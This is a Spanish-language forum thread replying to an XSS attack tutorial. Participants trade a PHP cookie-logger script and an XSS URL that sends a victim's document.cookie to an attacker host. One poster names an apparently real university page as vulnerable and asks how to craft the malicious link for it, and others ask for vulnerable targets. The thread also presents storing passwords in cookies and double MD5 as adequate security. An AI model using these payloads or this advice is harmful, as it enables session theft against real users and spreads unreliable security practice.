[::Tutorial::] - Ataques XSS

Iniciado por Rentero, 24 Mayo 2004, 03:49 AM

0 Miembros y 1 Visitante están viendo este tema.

Firos

Ok ok, muchas gracias, mas o menos tenia la idea ;)

Salu2..
El final del camino no está determinado, lo determinamos nosotros mismos paso a paso, día a día, y se puede cambiar.

-Riven-Ward-

Pido perdón por revivir este post un poco viejo, pero releyendolo me dí cuenta de algo:

Cita de: neohex en 24 Mayo 2004, 06:24 AM
poniendote el ejemplo de mi website:
yo cuando un usuario se loggea coloco dos cookies:
-Una con su nombre de usuario
-Otra con su password

a la primera la llamo n_user y a la segunda n_pass y si me hago el atako a mi mismo -> los valores que me dan(en el archivo.txt) son de esta forma:
n_user=neohex; n_pass=123456

Hace poco hice mi Sistema de Registro de users, y guardaba la cookie con el nombre del user y su contraseña.

Luego me dí cuenta de que si "algún hacker" entra en el PC de alguno de mis users, lo primero (o una de las primeras) cosas que hará sería ir a ver las Cookies, entonces obtendría la contraseña del user.

Y tomando en cuenta eso, supongo que las páginas importantes o los programadores "inteligentes" no guardarían la contraseña en una Cookie...


PD: neohex, te recomiendo que también dejes de guardar la contraseña en una Cookie
Usuario Banneado

Rentero

#12
Haber, mientras la contraseña esté bien cifrada no hay problema por el simple hecho de que si entra una persona en el pc de un user de tu website no creo que lo que vaya ha buscar sea precisamente la cookie de tu web, creo que se preocuparia por buscar otras cosas (como el archivo SAM y cosas mas importantes).

Ademas, es un riesgo que todo webmaster debe correr xD.

P.D: También hay que tener en cuenta que tu debes preocuparte de la seguridad de tu página web lo mismo que cada usuario debe preocuparse de la seguridad de su pc.
-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

P.D2: Preocupate por hacer tu web lo mas segura posible, que lo demas ya viene solo.
Firmado.

-Riven-Ward-

Cita de: neohex en 15 Julio 2004, 04:40 AM
Ademas, es un riesgo que todo webmaster debe correr xD.

--------

-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

1- No es necesario poner la contraseña en la cookie, no sirve de mucho :-\

2- Mucha, MUCHA gente usa la misma contraseña para casi todas sus cosas, y el "hacker" seguramente pensará en eso :).


Salu2!
Usuario Banneado

Rentero

Haber Riven tio.....que manía tienes con quedarte encima mia xDDD.

Te explico:
-Tienes que poner la contraseña en la cookie porque si pones solo el nombre de usuario cualquiera puede cambiar su cookie y poner el nombre del administrador con lo cual ya se ha saltado tu sistema...... ::)

Te repito que si alguien entra en tu pc no va ha ir precisamente a por la cookie de tu web, se encargará de hacer cosas "mas bonitas".

P.D: Mientras le pases md5(md5($pass)); es suficiente...por lo menos eso ya es incrackeable(por fuerza bruta, siempre que la contraseña sea de una longitud considerable.)
Firmado.

joserra89

Una cosa, todavia no e encontrado una web vulnerable, e buscado en todos mis favoritos y todos los buscadores no me dan la alerta, alguien sabe algun site que tenga el fallo ??? ??? ???
"Sin metodo, sin orden, sin voluntad, no es posible el triunfo"



9reynas

debido  a lo antiguo de este no se si  daran respuesta  bueno encontre una direccion que es vulnerable
http://campusvirtual.uma.es/ihj/_contenidos/buscador.php
bueno le das a <script>alert()</script> y te salta la alerta ,, asiq uebueno
umm cheque las fuentes y ....
<form action="" method="post">
<input type="text" name="search_term" size="40" maxlength="40" value="">
<input type="submit" value="Buscar">
</form>
como se daran cuenta este form no tiene ni nombre y el boton de envio tampoco tiene nombre mi pregunta es como quedaria la web a la  que le tendrian que linkear los demas
que hago remmplazo los espacios de los nombres con espacios vacios osea nada ??????????..............
asi ademas esta web  no tiene sistema de usuarios pero me queda la duda de como seria la direccionm aligna como dice neo hex

thank por las respuestas 9reynas

9reynas

respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google  ::)
bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie



cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

ahora viene so esta claro  lo del archivo.txt que se deposita la cokie alli tambiene sta caro
pero en esta url
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;


hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi  en este formato          lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form

aqui mi duda entonces l primer cgi seria buscador.php

ahora la primera pareja seria
palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

y la segunda pareja seria
buscar=;





ahora analizando la primera pareja checamos esta parte
'http://www.atacante.com/cookies.php?cookie='+document.cookie


ahora  en esto el  cgi seria cookies.php
y su pareja seria cookie='+document.cookie



ahora sia lguien postea las  fuentes de buscador.php seria buenisimo igual  la voya  buscar supongo que eso nos aclararia bastante loq ue hace esa url

buenoo voya buscar ciao 
9reynas
  de ante mano si me equivoco en algo corriganme y  nada salu2





Adept

Si la página esn vez de estar hecha en php está hecha en cfml, ¿cómo quedaría el código del archivo?
Those were the words of Adept...

Falso Positivo


Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>



Salu2.
Don't worry, be hacked....